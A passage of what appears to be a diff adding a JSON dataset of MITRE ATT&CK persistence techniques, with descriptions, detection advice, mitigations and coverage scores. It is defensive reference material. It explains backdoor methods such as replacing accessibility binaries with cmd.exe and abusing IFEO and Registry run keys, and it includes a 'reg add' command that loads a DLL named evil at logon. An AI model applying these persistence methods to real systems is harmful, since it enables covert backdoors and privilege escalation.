HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)", + "detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)", + "mitigations": [] + }, + { + "tid": "T1546.008", + "name": "Event Triggered Execution: Accessibility Features", + "url": "https://attack.mitre.org/techniques/T1546/008", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe", + "detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1546.009", + "name": "Event Triggered Execution: AppCert DLLs", + "url": "https://attack.mitre.org/techniques/T1546/009", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. ", + "detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1546.010", + "name": "Event Triggered Execution: AppInit DLLs", + "url": "https://attack.mitre.org/techniques/T1546/010", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)\n\nSimilar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)", + "detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1546.011", + "name": "Event Triggered Execution: Application Shimming", + "url": "https://attack.mitre.org/techniques/T1546/011", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.", + "detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.", + "mitigations": [ + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ] + }, + { + "tid": "T1546.012", + "name": "Event Triggered Execution: Image File Execution Options Injection", + "url": "https://attack.mitre.org/techniques/T1546/012", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)", + "detection": "Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)", + "mitigations": [] + }, + { + "tid": "T1546.013", + "name": "Event Triggered Execution: PowerShell Profile", + "url": "https://attack.mitre.org/techniques/T1546/013", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) \n\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) \n\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)", + "detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\My Documents\\PowerShell\\Profile.ps1\n* $Home\\My Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.", + "mitigations": [ + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1546.014", + "name": "Event Triggered Execution: Emond", + "url": "https://attack.mitre.org/techniques/T1546/014", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.\n\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.", + "detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1546.015", + "name": "Event Triggered Execution: Component Object Model Hijacking", + "url": "https://attack.mitre.org/techniques/T1546/015", + "description": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model) References to various COM objects are stored in the Registry. \n\nAdversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. ", + "detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. \n\nLikewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ", + "mitigations": [] + } + ], + "mitigations": [], + "cumulative_score": 1.060735674572381, + "adjusted_score": 1.060735674572381, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [ + "CM-2", + "CM-6", + "IA-9", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1547", + "name": "Boot or Logon Autostart Execution", + "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.", + "url": "https://attack.mitre.org/techniques/T1547", + "tactics": [ + "Persistence", + "Privilege Escalation" + ], + "detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Driver: Driver Load", + "File: File Creation", + "File: File Modification", + "Kernel: Kernel Module Load", + "Module: Module Load", + "Process: OS API Execution", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Creation", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1547.001", + "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder", + "url": "https://attack.mitre.org/techniques/T1547/001", + "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following run keys are created by default on Windows systems:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", + "detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [] + }, + { + "tid": "T1547.002", + "name": "Boot or Logon Autostart Execution: Authentication Package", + "url": "https://attack.mitre.org/techniques/T1547/002", + "description": "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)\n\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.", + "detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", + "mitigations": [ + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + } + ] + }, + { + "tid": "T1547.003", + "name": "Boot or Logon Autostart Execution: Time Providers", + "url": "https://attack.mitre.org/techniques/T1547/003", + "description": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)\n\nAdversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)", + "detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ] + }, + { + "tid": "T1547.004", + "name": "Boot or Logon Autostart Execution: Winlogon Helper DLL", + "url": "https://attack.mitre.org/techniques/T1547/004", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.", + "detection": "Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": 